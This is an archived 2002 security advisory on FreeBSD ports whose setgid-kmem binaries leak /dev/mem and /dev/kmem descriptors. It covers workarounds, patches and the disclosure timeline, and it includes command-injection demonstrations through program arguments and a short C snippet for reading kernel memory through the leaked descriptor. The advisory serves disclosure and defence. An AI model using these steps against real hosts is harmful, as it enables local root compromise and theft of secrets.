[UNIX] FreeBSD Ports libkvm Security Vulnerabilities

From: support@securiteam.com
Date: 09/16/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Mon, 16 Sep 2002 19:06:42 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  FreeBSD Ports libkvm Security Vulnerabilities
------------------------------------------------------------------------

SUMMARY

The FreeBSD ports asmon, ascpu, bubblemon, wmmon, and wmnet2 can be
locally manipulated to take advantage of open file descriptors /dev/mem
and /dev/kmem to gain root privileges on a target host. These five
programs are installed setgid kmem by default. They will drop kmem
privileges before executing user specified commands but file descriptors
to /dev/mem and /dev/kmem will remain open. This can lead to a local root
compromise in various ways (e.g. if an attacker chooses to scan for the
master password file in the Linux kernel memory).

DETAILS

The latest versions of all five above mentioned FreeBSD ports are
vulnerable, the following examples illustrate the problems:

bash-2.05a$ bubblemon "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"

dummy 688 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 688 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

bash-2.05a$ ascpu -exe "dummy&/usr/local/sbin/lsof|grep dummy|grepmem"

dummy 650 dim 4r VCHR 2,0 0t0 21146 /dev/mem
dummy 650 dim 5r VCHR 2,1 0xc040f54c 21145 /dev/kmem

bash-2.05a$ cat .wmmonrc
left "/home/dim/dummy"

bash-2.05a$ wmmon &
[1] 793

bash-2.05a$ Monitoring 5 devices for activity.
current stat is :1

bash-2.05a$ /usr/local/sbin/lsof |grep dummy|grep mem
dummy 797 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 797 dim 4r VCHR 2,1 0xc040f54c 21145 /dev/kmem

bash-2.05a$ wmnet2 -e "dummy&/usr/local/sbin/lsof|grep dummy|grep mem"
wmnet: using kmem driver to monitor ec0
dummy 584 dim 3r VCHR 2,0 0t0 21146 /dev/mem
dummy 584 dim 4r VCHR 2,1 0xc037cb8f 21145 /dev/kmem

One possible exploit for these vulnerabilities is to replace getch() in
strings(1) with:

int getch()
{
char buf[4];
read(4,buf,1);
return buf[0];
}

Or a similar less CPU expensive function that reads a character from the
/dev/mem file descriptor and execute the following:

wmnet2 -e exploit|grep root|grep Charlie

Detection:
The latest copies of asmon, ascpu, bubblemon, wmmon, and wmnet2 from the
FreeBSD ports collection are vulnerable and were tested on 4.6-RELEASE of
FreeBSD. According to FreeBSD, all FreeBSD ports that use libkvm prior to
and including 4.6.2-RELEASE may also be vulnerable.

Workaround:
Remove the setgid bit on the affected applications, however reducing the
functionality:

chmod g-s /path.to/wmnet2

Vendor response:
The FreeBSD advisory to be released in coordination with this advisory is
FreeBSD-SA-02:39.libkvm. FreeBSD has provided the following patch details:

"Upgrade your vulnerable system to 4.6-STABLE; or to the RELENG_4_6,
RELENG_4_5, or RELENG_4_4 security branch dated after the correction date
(4.6.2-RELEASE-p2, 4.5-RELEASE-p20, or 4.4-RELEASE-p27)."

Disclosure timeline:
August 12, 2002 - Disclosed to iDEFENSE
September 6, 2002 - Disclosed to FreeBSD Security
September 6, 2002 - Disclosed to iDEFENSE clients
September 16, 2002 - Coordinated public disclosure by FreeBSD and iDEFENSE

ADDITIONAL INFORMATION

This issue was exclusively disclosed to iDEFENSE by
<mailto:badc0ded@badc0ded.com> badc0ded.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • RE: PAWS security vulnerability
    ... FreeBSD security list" isn't grammatically correct. ... "I told you to post the patch and info to the appropriate FreeBSD security ... "...This point and others are often discussed on the mailing lists, ...
    (freebsd-questions)
  • FreeBSD Security Advisory FreeBSD-SA-05:09.htt
    ... For general information regarding FreeBSD Security Advisories, ... which time a revised version of this advisory will be published. ... To patch your present system: ...
    (FreeBSD-Security)
  • [FreeBSD-Announce] FreeBSD Security Advisory FreeBSD-SA-05:09.htt
    ... For general information regarding FreeBSD Security Advisories, ... which time a revised version of this advisory will be published. ... To patch your present system: ...
    (freebsd-announce)
  • Re: Fwd: FreeBSD hiding security stuff
    ... >>A few FreeBSD developers apparently have found some security issue ... we wil inform FreeBSD last. ... >>policy to be fixed, we are changing our policy as well. ... Matt replied stating that the aforementioned `advisory' wasn't ...
    (FreeBSD-Security)
  • Re: [Full-disclosure] To disclose or not to disclose
    ... advisory with all of the details. ... few really security minded people. ... Security as a market depends on disclosure, ... Who really think that botnet owners are dependent on socks-stress or DNS ...
    (Full-Disclosure)